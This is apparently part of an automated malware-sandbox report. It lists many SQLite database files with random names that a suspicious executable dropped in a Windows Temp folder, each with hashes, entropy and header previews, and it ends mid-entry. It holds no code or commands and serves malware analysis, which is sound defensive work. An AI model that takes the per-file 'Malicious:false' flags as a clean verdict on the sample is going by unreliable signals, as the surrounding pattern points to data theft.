                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\2N6o0NrB6I

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\2mUAKGVUbY

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\2si6RyquZB

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\3CodfdKB9K

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\3MeERiWtKS

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\3SrYpHn9Dc

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\3U6SW2PktU

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\3Z0cPY2qz5

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\3knGgE73vK

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\3xt3TfYg0k

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\48oche3RWV

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\4DGhR751jP

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):25
                                                                                                                                                                  Entropy (8bit):4.373660689688184
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:9FfWNKn:rfXn
                                                                                                                                                                  MD5:CD057CD9542B0E7296E48D008CF1549B
                                                                                                                                                                  SHA1:9A49817A8C53C410F21E20B00B6D054857C133EB
                                                                                                                                                                  SHA-256:E8EB84EC613CCD5F21256FDA23873D224868E9DB2B8A06C2AE7AEE207980BCD0
                                                                                                                                                                  SHA-512:AFA797BA21C2117941D9F40D778288BFC157D9B3872987027B7DAC5877BB5C7B8E2D7B7BFEBA774EE6C8C4AA775AA5AB11C8F9CE752C6DBC7839863E1DE3E9DB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:4NJy1Z6nzdV3xbGKjoRbfseKK

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\4clve1VHUm

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\4hWTLCG2uH

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\4jt7zptSjj

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\51A0B9M65H

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\5WZphFuRZg

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\5n2nK5Nw2R

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\6B1WXgOv9o

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\7BhKs2HjzD

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
